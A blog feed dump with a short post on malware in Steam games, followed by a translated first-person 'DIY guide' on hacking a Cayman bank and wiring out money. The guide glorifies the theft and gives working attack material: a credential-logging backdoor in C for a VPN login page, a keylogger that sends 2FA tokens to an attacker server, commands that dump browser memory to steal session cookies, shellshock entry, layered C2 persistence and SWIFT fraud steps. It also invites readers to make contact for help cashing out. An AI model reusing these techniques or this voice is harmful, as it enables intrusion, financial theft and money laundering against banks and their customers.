Hacking – Hack4Living https://hack4living.com My H4cking Journey Mon, 05 May 2025 22:39:20 +0000 en-US hourly 1 https://wordpress.org/?v=6.8.1 From Playtime to Pwned : The Hidden Backdoors in Steam Games https://hack4living.com/2025/03/14/from-playtime-to-pwned-the-hidden-backdoors-in-steam-games/ Fri, 14 Mar 2025 22:37:29 +0000 https://hack4living.com/?p=169 It’s the weekend, and nothing beats a bottle of wine and a new story-driven game to play! Maybe a cute indie game to relax and chat with friends on Discord. 😌🎼

If this sounds like you or something you’d like to do,I’m pretty sure you’ve had this dilemma before:
Should I turn off my brain for a few seconds, embrace the risk, and visit FitGirl’s website for a cracked game? Or should I be wiser, spend some money on Steam, and play safely?

Well, after reading this article, you might start thinking more than twice I promise!

I was in that exact situation today. I was hanging out on Discord with my people, telling them how tired I was and how I just wanted to buy a new game to chill. Lol! And guess what? My homie said, Keep downloading Steam games, and you’ll get pwned soon! HAHA!

We’re a branch of hackers. We know how a lot of things work, but we also believe there’s a lot we don’t know. So, I asked my friend what he was talking about—and he showed me this article :

https://www.pcmag.com/news/did-you-download-this-steam-game-sorry-its-windows-malware

Dude, what?! Are you telling me that games hosted on Steam contain malware?

Isn’t Steam supposed to be the safe place to download games?

Unfortunately, it’s true, Steam isn’t as safe as you might think. Just like the Play Store or any other game marketplace, hackers always find ways to spread malware. But the real question is : how?

I mean, isn’t Steam a huge company? Don’t they have a security team doing thorough checks and reviews?

I don’t know, man
 But with the crazy prices we pay for games, I’m not buying the idea that they don’t have security checks or that they have weak ones!

To make myself believe, I need to see the truth, smell it, and taste it.

So let’s do our research!

First thing to do is understandhow things work.

So, how are games pushed onto Steam, and who can upload them ? đŸ€”

This a general little map I mad to make you understand how it wors :

General Process.

You should know that anyone can create and publish a game on Steam including you.

The process is surprisingly simple. Here’s how it works:

1⃣ Develop the game – Whether it’s a small indie project or a full-fledged title, you just need a playable build.
2⃣ Create a developer account on Steamworks – This is Steam’s platform for game creators.
3⃣ Pay a $100 fee – This one-time fee per game grants you publishing rights.
4⃣ Submit your game for review – Steam runs a basic verification process before approving it for release.

Sounds safe, right? Not really. The review process isn’t as strict as you might think, which opens the door for shady developers to sneak in malicious code.

But let’s dig deeper
 How does Steam actually review these games, and can malware slip through?

Steam does have a review process, but it’s not as strict as you might expect. Unlike mobile app stores that use automated malware scans and security policies, Steam’s approach is more focused on content moderation rather than deep security analysis. Here’s how it works:

1⃣ Basic Verification – Steam ensures that the developer has paid the $100 fee and that the game has actual content (not just a blank launcher).
2⃣ Automated Scans – Some basic checks are performed, but they mainly focus on preventing obvious scams, not deep malware detection.
3⃣ Community Review & Reports – Once a game is published, it relies heavily on user reports and reviews. If a game is flagged as suspicious, Steam might investigate.

The Problem?

💀 No Deep Security Audits – There’s no in-depth malware scanning or strict sandbox testing like you’d find on Apple’s App Store.
💀 Social Engineering Works – Hackers can disguise malicious software as game launchers, mods, or even “updates.”
💀 Once It’s Live, It’s Too Late – By the time Steam removes a bad game, many users might have already downloaded it.

So, can malware slip through? Absolutely. Hackers just need to disguise it well enough to pass Steam’s surface-level checks. But what kind of malware are we actually talking about? Let’s break it down
 đŸ”„đŸ‘€

Looking arround on the internet ive found people talking about this :

https://www.reddit.com/r/Steam/comments/10ijrhe/how_does_steam_determine_if_a_game_doesnt_have
https://www.reddit.com/r/Steam/comments/10ijrhe/how_does_steam_determine_if_a_game_doesnt_have


Firsy Who is Valve, and What’s Their Role in This?

Before we go deeper, let’s talk about Valvethe company behind Steam.

Valve Corporation is a gaming giant that started in 1996, best known for legendary titles like Half-Life, Counter-Strike, and Portal. But what really put them on another level was the launch of Steam in 2003—which began as a simple game launcher and evolved into the world’s biggest PC gaming marketplace.

What’s Valve’s Role in Steam?

Valve owns and operates Steam, meaning they control everything from game publishing rules to security policies. But here’s the catch:

đŸ”č They prioritize profits over policing – Steam takes a 30% cut from every game sale, meaning their goal is to have more games, more sales, more revenue—not necessarily more security.

đŸ”č They rely on automation – Instead of having a strict security team manually reviewing each game, Valve automates most of the process. This makes it easier for sketchy developers to slip through.

đŸ”č They have a history of ignoring issues – Valve has been called out multiple times for allowing scam games, fake developers, and even malware-ridden software to be sold on Steam. Their slow response to security risks has raised serious concerns in the gaming community.

So, Can We Really Trust Steam?

Steam is massive, but it’s also flawed. Valve’s hands-off approach makes it easy for malicious actors to take advantage of the system. And if you think they’re actively hunting down malware before it reaches you
 think again.

The real question is: What kind of threats are we dealing with, and how are hackers exploiting Steam? đŸ”„đŸ’€

Before we dive into that, let’s zoom in and take another look at that last Reddit screenshot. It mentions something interesting back in 2016, Street Fighter V rolled out an update meant to stop cheating, but instead, it introduced a serious vulnerability. This flaw could be exploited by other malicious software, making the system even more vulnerable.

So, this isn’t a new issue. In fact, I found multiple articles discussing similar incidents. Steam’s security flaws have been exposed before, and the risks are still very real today. Let’s break it down
 🚹👀

https://www.bitdefender.com/en-us/blog/hotforsecurity/after-hackers-distribute-malware-in-game-updates-steam-adds-sms-based-security-check-for-developers
https://www.bitdefender.com/en-us/blog/hotforsecurity/steam-users-beware-bad-guys-hide-malware-inside-fake-game-demos
https://www.bleepingcomputer.com/news/security/piratefi-game-on-steam-caught-installing-password-stealing-malware/
https://www.pcgamer.com/steam-malware-attack-new-security/
https://courses.csail.mit.edu/6.857/2018/project/Onsongo-Sanabria-Comas-Herold-Steam.pdf
https://x.com/JinkirinGaming/status/1722069476982559088

This is a lot—and with so many other articles out there, it only proves that this is real.

Now, let’s get back to the most important question:

What kind of threats are we dealing with, and how are hackers exploiting Steam? đŸ”„đŸ’€

Due to my daily job as a redteamer the answer for this question was obvios and here is some scenarios that may happen!

First take a look and how the steam dev dashboars looks like from inside when you create an account for the first time

Main Page to create account.
Dashboard.

They’ll ask for some information, but you can just throw in random bla bla data and pay the fee no problem.

There’s no verification to check if your company actually exists or if your dev team is even real. As long as you pay, you can publish. 💰🚀

Steam.

So, it’s easy, right? You develop a sweet, undetectable piece of malware, mix it into a game, and publish it on Steam.

Well
 it’s possible, but is it the best way?

Do you have the skills to create a game that actually attracts players? Doubt it. 😂
Do you have a big company name with an existing fanbase waiting for your releases and updates? Absolutely not.

So
 what now?

Well, why not target gaming companies instead?
Pwn their engineers and employees, steal their accounts, and use them to push your malware the easy way.

Sounds a bit too advanced for your skiddie skills, huh? 😏

Or maybe
 you don’t even need to hack them. Because guess what?
They’re already hacked.

Just check these stealer logs they’re full of compromised accounts from game developers. Access already granted. Just push malicious Updates đŸ”„

hihi

Up to this point, we’ve already pushed the limits, there’s no need to go further with PoCs or anything that could land us in jail. 🚹

The goal was never to show how to do it, but to make you think twice
 or even more before trusting everything you download.

And I think you will. 😉

]]>
A DIY guide https://hack4living.com/2012/04/27/a-diy-guide/ Fri, 27 Apr 2012 23:16:53 +0000 https://hack4living.com/?p=279

**********************************************************************************

The original can be found in spanish at:
https://web.archive.org/web/20191117042838/http://data.ddosecrets.com/file/Sherwood/HackBack.txt

footnotes beginning with * have been added to explain spanish-language cultural
references in the text

other footnotes have been substituted with english language references when available

poetry and lyrics have been left untranslated, as that requires a much more
skilled writer than myself to translate well

**********************************************************************************

This is my simple word, which seeks to touch the hearts of those who are humble
and simple, but also dignified and rebellious. This is my simple word to tell
about my hacks, and to invite others to hack with joyful rebellion. [*1]

I hacked a bank. I did it to give an injection of liquidity, but this time from
below [*2], for the simple and humble people that resist and rebel against
injustice all over the world [*1]. In other words, I robbed a bank and gave away
the money. But I didn't do it myself. The free software movement, the offensive
powershell community, the metasploit project, and the general hacker community
made the hack possible. The community at exploit.in made it possible to turn the
compromise of a bank's computers into cash and bitcoin. And the Tor, Qubes, and
Whonix projects, along with cryptographers, and anonymity and privacy activists,
are my nahuales (protectors) [1]. They accompany me every night and make it
possible for me to remain free.

I didn't do anything complicated. I just saw the injustice in this world, felt
love for everyone, and expressed that love the best way I knew how, through the
tools I knew how to use. I'm not motivated by hate for banks or the rich, but by
a love for life, and a desire for a world where everyone can realise their
potential and live fully. I hope to explain a little how I see the world, so you
can understand how I came to feel and act this way. And I hope this guide is a
recipe you can follow, to combine the same ingredients and bake the same cake.
Who knows, maybe these same powerful tools can help you to express your love.



[*1] text adapted from the Zapatistas' Sixth Declaration
http://enlacezapatista.ezln.org.mx/2005/06/30/sixth-declaration-of-the-
selva-lacandona/
[*2] a reference to a speech in the series La casa de papel

The police will spend endless resources investigating me. They think the system
works, or at least it will once they arrest all the "bad guys". I'm just the
product of a broken system. As long as there's injustice, exploitation,
alienation, violence, and ecological destruction, there'll be an endless series
of people like me, who reject as illegitimate the system responsible for such
suffering. Arresting me won't fix their broken system. I'm just one of millions
of seeds of rebellion planted by Tupac 238 years ago in La Paz [2], and I hope
that my actions and writings water the seed of rebellion in your hearts.

[1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
[2] before being murdered by the Spanish he said "they'll kill me, but I'll
return as millions".


[*] famous quote by Marcos

To make ourselves heard [*1], hackers sometimes have to adopt a mask, as we're
not interested in our identity being known, but in our word being understood.
The mask can be from Guy Fawkes, Salvador DalĂ­, Fsociety, or even a puppet of a
frog [*2]. I felt most affinity for Marcos, so I dug up his grave [*3] to use
his balaclava. I should make clear that Marcos is entirely innocent of
everything I say here due to the simple fact that, in addition to being dead,
I've never spoken to him. I hope that his ghost, if he finds out about this from
his hammock in Chiapas, will have the generosity to simply, as they say over
there, "look past me", with the same face that one would look at the passing of
an untimely insect-an insect that might very well be a beetle. [*4]

[*1] referencing another famous quote by Marcos,
"Our fight has been to make ourselves heard"
[*2] referring to the masks adopted by Anonymous, La casa de papel, Mr. Robot,
and https://www.youtube.com/watch?v=BpyCl1Qm6Xs
[*3] Marcos symbolically died:
http://enlacezapatista.ezln.org.mx/2014/05/27/between-light-and-shadow/
[*4] This explanation on using Marcos' words is from Marcos/Galeano's
explanation of using the words of Javier MarĂ­as in:
http://enlacezapatista.ezln.org.mx/2019/08/14/the-overture-reality-as-enemy
which in turn references Durito, a beetle who makes frequent appearances in
Marcos' writing.

Even with the mask and change of name, many who support my actions will put too
much attention on me. With their individual agency broken by a lifetime of
domination, they look for a leader to follow or a hero to save them. But behind
the mask, I'm just a child. Todos somos niños salvajes. Nós só temos que colocar
uma estrela em chamas em nossos coraçÔes.



--[ 1 - Why Expropriate ]-------------------------------------------------------

Capitalism is a system where a minority, through war, theft and exploitation,
have laid claim to the vast majority of the world's resources. By taking away
the commons [1], they forced the majority under the control of the minority that
own everything. It's a system that's fundamentally incompatible with freedom,
equality, democracy, and Buen Vivir. That might sound ridiculous to those of us
who grew up with a propaganda machine teaching us that capitalism is freedom,
but it's not a new or controversial idea [2]. The founders of the US knew they
had to choose between creating a capitalist society, or a free and democratic
one. Madison recognized that "the man who is possessed of wealth, who lolls on
his sofa or rolls in his carriage, cannot judge of the wants or feelings of the
day laborer." But to protect against "a leveling spirit" from the landless
labourers, he felt that only landowners should vote, and the government should
be designed "to protect the minority of the opulent against the majority". John
Jay was more to the point, saying: "the people who own the country ought to
govern it".


In the same way that bell hooks [3] argues that it's in men's self-interest to
reject the dominator culture of patriarchy, as it emotionally cripples them and
prevents them from fully feeling love and connection, I think the dominator
culture of capitalism has a similar effect on the rich, and that they could live
more whole and fulfilling lives by rejecting the class system they think they
benefit from. For many, class privilege just means a childhood of emotional
neglect, followed by a lifetime of superficial social interaction and
meaningless work. They may know deep down that they can only genuinely connect
with people when they work with them as equals, not when people work for them.
They may know that the most fulfilling thing they could do with their material
wealth is to share it. They may know that meaningful experiences, connections,
and relationships don't come from market interactions, but by rejecting the
logic of the market and giving without expecting anything in return. They may
know that all they need to do to break out of their prison and truly live is to
let go, lose control, and take a leap of faith. But most just aren't brave
enough.

So it would be naive to focus our efforts on trying to spark a spiritual or
moral awakening in the rich [4]. As Assata Shakur says: "Nobody in the world,
nobody in history, has ever gotten their freedom by appealing to the moral sense
of the people who were oppressing them." In reality, when the rich give away
their money, they almost always do so in a way that reinforces the system that
allowed them to amass a huge amount of illegitimate wealth in the first place
[5]. And change is unlikely to come through the political process, as Lucy
Parsons says: "We can never be deceived that the rich will allow us to vote
their wealth away". In [6], Colin Jenkins justifies expropriation:

Make no mistake, expropriation is not theft. It is not the confiscation of
"hard-earned" money. It is not the stealing of private property. It is,
rather, the recuperation of massive amounts of land and wealth that have
been built on the back of stolen natural resources, human enslavement, and
coerced labor, and amassed over a number of centuries by a small minority.
This wealth ... is illegitimate, both in moral principle and in the
exploitative mechanisms in which it has used to create itself.

He thinks the first step is, "we must free our mental bondage (believing wealth
and private property have been earned by those who monopolize it; and, thus,
should be respected, revered, and even sought after), open our minds, study and
understand history, and recognize this illegitimacy together." Some books that
helped me with that were [7][8][9][10][11].

According to Barack Obama, economic inequality is "the defining challenge of our
time". Computer hacking is a powerful tool for addressing economic inequality.
Keith Alexander, the former director of the NSA, agrees, saying hacking is
responsible for "the greatest transfer of wealth in history".


[*] "History is ours, and people make history." is a famous quote from Allende's
last speech before being killed in a CIA backed coup:
https://en.wikisource.org/wiki/Salvador_Allende%27s_Last_Speech

[1] http://www.thelandmagazine.org.uk/articles/short-history-enclosure-britain
[2] https://chomsky.info/commongood02/
[3] The Will to Change: Men, Masculinity, and Love
[4] their own religion is already very clear on the subject:
https://www.openbible.info/topics/rich_people
[5] The Ideology of Philanthropy: The Influence of the Carnegie, Ford, and
Rockefeller Foundations on American Foreign Policy
[6] http://www.hamptoninstitution.org/expropriation-or-bust.html
[7] Manifesto for a Democratic Civilization
Volume 1 — Civilization: The Age of Masked Gods and Disguised Kings
[8] Caliban and the Witch
[9] Debt: The First 5,000 Years
[10] A People's History of the United States
[11] Open Veins of Latin America



[*] a reference to "Our word is our weapon", a collection of Marcos' writings

--[ 2 - Introduction ]----------------------------------------------------------

This guide explains how I hacked Cayman National Bank and Trust Company (Isle
of Man). Why am I publishing this almost four years later?

1) To show what is possible

Hackers working for social change have limited themselves to the development of
privacy and security tools, DDoS, defacements, and leaks. Around the world,
projects for radical social change exist in a state of complete precarity, and
could do a lot with a little expropriated money. At least among the working
class, bank robbing is socially accepted, and the robbers often seen as folk
heroes. In the digital age, bank robbing is nonviolent, less risky, and has a
higher payoff than ever. So why is it only being done by blackhats for personal
profit, and not by hacktivists to fund radical projects? Maybe they don't
imagine themselves as capable of it. Major bank hacks have occasionally been in
the news, such as the Bangladesh Bank hack [1] attributed to North Korea, and
bank hacks attributed to the Carbanak [2] group, described as being a very
organised and large group of russian hackers with different members specialising
in different jobs. It's not that complicated.

Through our collective belief that the financial system is unchallengeable, we
control ourselves, and maintain the class system without those at the top really
needing to do anything [3]. Seeing how vulnerable and fragile the financial
system really is helps to break that collective delusion. So banks have a
strong incentive to not report hacks, and to overstate the sophistication of the
attackers. Every financial hack that I've done or known of has not been made
public. This will be the first, and only because I decided to publish, not the
bank.

As you'll learn in this DIY guide, hacking a bank and wiring out money through
the SWIFT network does not require the backing of a government, or a large,
professional and specialised group. It is entirely possible as an amateur,
unsophisticated hacker, with public tools and basic scripting knowledge.

[1] https://en.wikipedia.org/wiki/Bangladesh_Bank_robbery
[2] https://en.wikipedia.org/wiki/Carbanak
[3] https://en.wikipedia.org/wiki/Cultural_hegemony

2) Helping others cash out

Many people reading this will already have, or with some dedicated study, will
be able to learn the technical skills needed to do a similar hack. However, many
will not have the criminal connections necessary to cash out properly. This was
the first bank I hacked, and at the time I only had mediocre bank drops
(accounts for safely receiving and cashing out illegal transfers), so I was only
able to wire out a couple hundred thousand in total when it's normal to make
millions. I do now have the knowledge and connections to properly cash out, so
if you hack a bank but need help turning that access into actual money, and want
to use that money to fund radical social projects, contact me.

3) Collaboration

It is possible to hack banks as an amateur hacker working alone, but it's not
usually quite as easy as I make it look here. I got lucky with this bank for
several reasons:

1) It was a small bank, which meant it took a lot less time to understand how
everything worked.

2) They had no process to review sent swift messages. Many banks do, and you
need to write code to hide your wires from their monitoring.

3) They just used password authentication to access their application for
connecting to the SWIFT network. Most banks are now using RSA SecurID or some
form of 2FA. This can be bypassed by writing code to alert you when they
enter their token so you can use it before it expires. This is simpler than
it sounds. I've used Get-Keystrokes [1] modified not to store keylogs but
just to, when it detects their username has been typed, make a GET request to
my server with their username appended to the url, and then as they type the
token, make GET requests with the digits of the token appended to the url.
Meanwhile on my computer I have running:

ssh me@secret_server 'tail -f /var/log/apache2/access_log'
| while read i; do echo $i; aplay alert.wav &> /dev/null; done

If it's a web application, you can bypass 2FA by stealing their cookie after
they've authenticated. I'm not an APT with a team of programmers to write
custom tools. I'm just a simple person living off the land [2], so I've used:

procdump64 /accepteula -r -ma PID_of_Browser
strings64 /accepteula *.dmp | findstr PHPSESSID 2> nul

or running through findstr before strings makes it a lot faster:

findstr PHPSESSID *.dmp > tmp
strings64 /accepteula tmp | findstr PHPSESSID 2> nul

You can also bypass it by accessing their session with hidden VNC after
they've authenticated, or by being a little creative and targeting another
part of their process rather than just sending SWIFT messages directly.

I feel like by collaborating with other experienced bank hackers, we could be
doing 100s of banks like Carbanak, rather than doing one every now and then by
myself. So if you have experience doing similar hacks and would like to
collaborate, contact me. My PGP key and email is at the end of [3].

[1] https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1
[2] https://lolbas-project.github.io/
[3] https://www.exploit-db.com/papers/41915



--[ 3 - Stay safe out there ]---------------------------------------------------

It's important to take some simple precautions. I'll reference this section from
my last guide [1], since it apparently works well enough [2]. All I'll add is
that, as Trump has said, "Unless you catch hackers in the act, it is very hard
to determine who was doing the hacking.", so police are getting increasingly
creative [3][4] in their attempts to catch criminals in the act (and with their
encrypted disks unlocked). It'd be good to have your computer automatically
shutdown when a bluetooth device on your person moves out of range, or an
accelerometer detects movement or something.

It's probably not safe to write long papers detailing your ideology and actions
(oops!), but sometimes I feel I should.

Si no creyera en quien me escucha
Si no creyera en lo que duele
Si no creyera en lo que quede
Si no creyera en lo que lucha
Que cosa fuera...
ÂżQue cosa fuera la maza sin cantera?

[*] Lyrics from the song La Maza by Silvio RodrĂ­guez

[1] https://www.exploit-db.com/papers/41915
[2] https://motherboard.vice.com/en_us/article/3k9zzk/hacking-team-hacker-
phineas-fisher-has-gotten-away-with-it
[3] https://www.wired.com/2015/05/silk-road-2/
[4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
alphabay-arrest-video


Many blame queers for the decline of this society;
we take pride in this
Some believe that we intend to shred-to-bits this civilization and it's moral fabric;
they couldn't be more accurate
We're often described as depraved, decadent and revolting
but oh, they ain't seen nothing yet

https://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime


--[ 4 - Getting In ]------------------------------------------------------------

In [1] I talk about the main ways to get initial access in a company's network
during a targeted attack. However, this was not a targeted attack. I didn't set
out to hack a specific bank, I just wanted to hack any bank, which is a much
easier task. This sort of untargeted approach was popularised by Lulzsec and
Anonymous [2]. For [1], I'd prepared an exploit and post-exploitation tools for
a popular VPN device. Afterwards, I scanned the internet with zmap [3] and zgrab
to identify other vulnerable devices. I had the scanner record vulnerable IPs,
along with the common name and alternative names from the device's SSL
certificate, windows domain names from the device, and the IP's reverse DNS
lookup. I grep'd the output for "bank", and had plenty to choose from, but the
word "Cayman" really caught my eye, so that's how I picked this one.

[1] https://www.exploit-db.com/papers/41915
[2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
[3] https://github.com/zmap/zmap


----[ 4.1 - The Exploit ]-------------------------------------------------------

When I published my last DIY guide [1], I didn't reveal details of the sonicwall
exploit I used to hack Hacking Team, as it was quite useful for other hacks such
as this one, and I wasn't done having fun with it yet. Determined to hack
Hacking Team, I'd spent weeks reverse engineering their model of sonicwall
ssl-vpn, and even managed to find several somewhat difficult to exploit memory
corruption vulns, before I realised it was easily exploitable with shellshock
[2]. When shellshock came out, many sonicwall devices were vulnerable, just with
a request to cgi-bin/welcome, and a payload in the user-agent. Dell released a
security update and advisory for those versions. The version used by Hacking
Team and this bank had the vulnerable version of bash, but cgi requests wouldn't
trigger shellshock except for requests to a shell script, and there was one
accessible: cgi-bin/jarrewrite.sh. This apparently escaped the notice of Dell as
they never issued a security update or advisory for that version of sonicwall.
And helpfully, dell had made dos2unix setuid root, making the device easy to
root.

In my last guide, many read that I spent weeks researching a device and coming
up with an exploit, and assumed that meant I was some sort of elite hacker. The
reality, that it took me two weeks to realise that it was trivially exploitable
with shellshock, is perhaps less flattering for me, but I think is more
inspiring. It shows you really can do this yourself. You don't need to be a
genius, I'm certainly not. In reality my work against Hacking Team began a year
earlier. When I learned about Hacking Team and Gamma Group from Citizen Lab's
research [3][4], I decided to poke around and see if I could find anything. I
didn't get anywhere with Hacking Team, but with Gamma Group I got lucky and was
able to hack their customer support portal with basic sql injection and file
upload vulns [5][6]. However, despite the support server giving me a pivot into
Gamma Group's internal network, I was unable to further compromise the company.
From my experience with Gamma Group and other hacks, I realised I was really
limited by my lack of knowledge of privilege escalation and lateral movement in
windows domains, and lack of knowledge of active directory and windows in
general. So I studied and practiced (see section 11), until I felt ready to
revisit Hacking Team almost a year later. The practice paid off, and that time I
was able to fully compromise the company [7]. Before I realised that I could get
in with shellshock, I was prepared to happily spend months studying exploit
development and writing a reliable exploit for one of the memory corruption
vulns I'd found. I just knew that Hacking Team needed to be exposed, and that
I'd take as long as I needed and learn whatever I needed to make that happen. To
do these hacks you don't need to be brilliant. You don't even need great
technical knowledge. You just need to be dedicated and to believe in yourself.

[1] https://www.exploit-db.com/papers/41915
[2] https://en.wikipedia.org/wiki/Shellshock_(software_bug)
[3] https://citizenlab.ca/tag/hacking-team/
[4] https://citizenlab.ca/tag/finfisher/
[5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
bahrain-track-arab-spring-protesters/
[6] https://www.exploit-db.com/papers/41913
[7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam


----[ 4.2 - The Backdoor ]------------------------------------------------------

Part of the backdoor that I'd prepared for Hacking Team (see [1] section 6) was
a simple wrapper around the login page to record passwords:

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>

int main()
{
char buf[2048];
int nread, pfile;

/* read the log if special cookie is set */
char *cookies = getenv("HTTP_COOKIE");
if (cookies && strstr(cookies, "secret password")) {
write(1, "Content-type: text/plain\n\n", 26);
pfile = open("/tmp/.pfile", O_RDONLY);
while ((nread = read(pfile, buf, sizeof(buf))) > 0)
write(1, buf, nread);
exit(0);
}

/* parent stores POST data and sends to
child which is real login program */
int fd[2];
pipe(fd);
pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
if (fork()) {
close(fd[0]);

while ((nread = read(0, buf, sizeof(buf))) > 0) {
write(fd[1], buf, nread);
write(pfile, buf, nread);
}

write(pfile, "\n", 1);
close(fd[1]);
close(pfile);
wait(NULL);
} else {
close(fd[1]);
dup2(fd[0],0);
close(fd[0]);
execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin",
"userLogin", NULL);
}
}


In the case of Hacking Team, they logged into the VPN with one-time passwords,
so the VPN just got me network access and I still needed to do some work to get
domain admin in their network. I wrote about lateral movement and privilege
escalation in windows domains in that guide [1]. In this case, their windows
domain passwords were used for authentication with the VPN, so I got a bunch of
windows passwords, including a domain admin. I now had full access in their
network, but that's normally the easy part. The harder part is understanding how
they operate and how to get money out.

[1] https://www.exploit-db.com/papers/41915


----[ 4.3 - Fun Facts ]---------------------------------------------------------

Interestingly, from following their investigation of the hack, it seems someone
else may have independently compromised the bank around the same time I did,
with a targeted phishing email [1]. As the old saying goes, "give someone an
exploit and they'll have access for a day, teach them to phish and they'll have
access for life" [2]. Also, that someone else randomly targeted the same small
bank at the same time I did (they'd registered a domain similar to the bank's
real one to send the phish from), suggests that bank hacks are happening way
more often than is being reported.

A fun tip so that you can follow investigations of your hacks, is to have backup
access that you don't touch unless you lose your normal access. I have one
simple script that just asks for commands once a day or less, and is just for
maintaining long term access in the event my normal access is blocked. Then I
had powershell empire [3] connecting back more frequently to a different IP, and
had empire spawn meterpreter [4] to a third IP, which I used for most of my
work. When PWC came to investigate the hack, they found the empire and
meterpreter usage and cleaned those computers and blocked those IPs, but didn't
detect my backup access. PWC had added network monitoring devices so they could
analyze traffic and find if computers were still infected, so I didn't want to
connect to their network much. I just ran mimikatz once to get their new
passwords, and then followed along with their investigation by reading their
emails in outlook web access.

[1] page 47, Project Pallid Nutmeg.pdf, in torrent
[2] https://twitter.com/thegrugq/status/563964286783877121
[3] https://github.com/EmpireProject/Empire
[4] https://github.com/rapid7/metasploit-framework


--[ 5 - Understanding a Bank's Operations ]-------------------------------------

In order to understand how the bank operated and how I could get money out, I
followed the techniques I outlined in [1] in section "13.3 - Internal
reconnaissance". I downloaded a list of all filenames, grep'd it for words like
"SWIFT" and "wire", and downloaded and viewed any files with interesting names.
I also searched employee emails, but by far the most useful technique was
watching how bank employees work with keylogging and screenshots. I didn't know
about it at the time, but windows comes with a great built in monitoring tool
for this [2]. As described in [1] in 13.3 technique #5, I keylogged the whole
domain (recording window titles along with keystrokes), grep'd for SWIFT,
and found some employees opening 'SWIFT Access Service Bureau - Logon'. For
those employees, I executed meterpreter as in [3], and used the
post/windows/gather/screen_spy module to take screenshots every 5 seconds, to
watch how they work. They were using a remote citrix app from bottomline [4] to
access the SWIFT network, where each SWIFT MT103 payment message had to pass
through three employees, one to "create" the message, one to "verify" it, and
one to "authorise" it. Since I had all their credentials thanks to the
keylogger, I could easily do those three steps myself. And as far as I could
tell from watching them work, they did not review sent SWIFT messages, so I
should have enough time to get money out of my bank drops before the bank
notices and tries to reverse the wires.

[1] https://www.exploit-db.com/papers/41915
[2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
remotely-with-metasploit/
[3] https://www.trustedsec.com/2015/06/no_psexec_needed/
[4] https://www.bottomline.com/uk/products/bottomline-swift-access-services


--[ 6 - Sending the money ]-----------------------------------------------------

I had no clue what I was doing and was just figuring it out as I went along.
Somehow the first wires I sent out went fine. The next day, I messed up sending
a wire to mexico which put an end to my fun. This bank was sending their
international wires thanks to their correspondent account at Natwest. I'd seen
that wires in GBP had their correspondent listed as NWBKGB2LGPL, while all
others were NWBKGB2LXXX. The mexican wire was in GBP so I assumed I should put
NWBKGB2LGPL as the correspondent. However, if I'd done more preparation I'd have
known that the GPL instead of XXX meant to send the payment via the UK-only
Faster Payments Service, rather than as an international wire, which obviously
isn't going to work when trying to send money to mexico. So the bank got an
error message back. The same day, I also tried to send a ÂŁ200k payment to the UK
using NWBKGB2LGPL, which failed because 200k was over their limit for sending
via faster payments so I needed to use NWBKGB2LXXX. They got an error message
for that too. They read the messages, investigated, and saw the rest of my
wires.


--[ 7 - The loot ]--------------------------------------------------------------

From my writing, you probably have a good sense of what my ideas are and what I
support. However, I don't want anyone to have legal problems over receiving
expropriated funds, so I won't say anything more about where the money went.
Journalists will also probably want to put a dollar figure on how much I
redistributed through this and similar hacks, but I'd rather not encourage our
perverse habit of measuring actions by their economic value. Any action, done
from a place of love rather than ego, is admirable. Unfortunately, those our
society most respects and values: public figures, businessmen, people in
"important" positions, and the rich and powerful, generally got where they are
by acting more out of ego that out of love. It's the simple, humble, and
"invisible" people that we should look for and admire.


--[ 8 - Cryptocurrency ]--------------------------------------------------------

Redistributing expropriated money to awesome projects making positive social
change would be easier and safer if those projects accepted anonymous donations
via cryptocurrency like monero, zcash, or at least bitcoin. Understandably, a
lot of those projects have an aversion to cryptocurrency, as it looks more like
some weird hypercapitalist dystopia than the social economy we envision. I share
their skepticism, but think that it is useful for enabling anonymous donations
and transactions, and limiting government surveillance and control. Much like
cash, which for the same reasons many countries are trying to limit the use of.


--[ 9 - Powershell ]------------------------------------------------------------

In this, and in [1], I made heavy use of powershell. At the time, powershell was
great, you could do pretty much anything you wanted, with no AV detection and
little forensic footprint. However with the introduction of AMSI [2], offensive
powershell is on the way out. Nowadays offensive C# is in, with tools like
[3][4][5][6]. AMSI is coming to .NET in 4.8 so C# tools will probably have a
nice couple years before they also go out of style. Then we'll go back to using
C or C++, or maybe Delphi will come back in style. Specific tools and techniques
change every couple of years but there's really not that much change. Hacking
today is fundamentally the same as it was in the 90s. Even all the powershell
scripts used here and in [1] are still perfectly usable today, after a little
custom obfuscation.

[1] https://www.exploit-db.com/papers/41915
[2] https://medium.com/@byte_St0rm/
adventures-in-the-wonderful-world-of-amsi-25d235eb749c
[3] https://cobbr.io/SharpSploit.html
[4] https://github.com/tevora-threat/SharpView
[5] https://www.harmj0y.net/blog/redteaming/ghostpack/
[6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/



--[ 10 - Torrent ]---------------------------------------------------------------

Privacy for the weak, transparency for the powerful.

Offshore banking provides businessmen, politicians, and the rich with privacy
from their own government. It might seem hypocritical for me to expose them,
seeing as I'm generally in favor of privacy and against government surveillance.
However, the law was already written by and for the rich to protect their system
of exploitation, with some limits (ie taxation), so that society can function
and their system doesn't collapse under their own greed. So privacy for the
powerful, allowing them to evade the limits of a system already designed to
privilege them, is not the same thing as privacy for the weak, which protects
them from a system designed to exploit them.

Even journalists with the best intentions can't possibly look through such a
massive amount of material and know what is relevant to different people around
the world. When I leaked Hacking Team's files, I'd given the Intercept
everything but the RCS source code a month ahead of time. They found a couple of
the 0days Hacking Team was using and reported them to MS and Adobe ahead of
time, and published a few stories after the leak was public. Compare that with
the massive amount of stories and research that came out of the full public
leak. Looking at that, and the managed (non)release [1] of the panama papers, I
think fully and publicly leaking the material is the correct choice.

[1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
protect-western-1-from-panama-leak/


Psychologists have found that those at the bottom of hierarchies tend to
empathise with and understand those at the top, but that the reverse is less
common. This explains why in this sexist world, many men joke about how they
can't understand women, as if they're an inexplicable mystery. It explains why
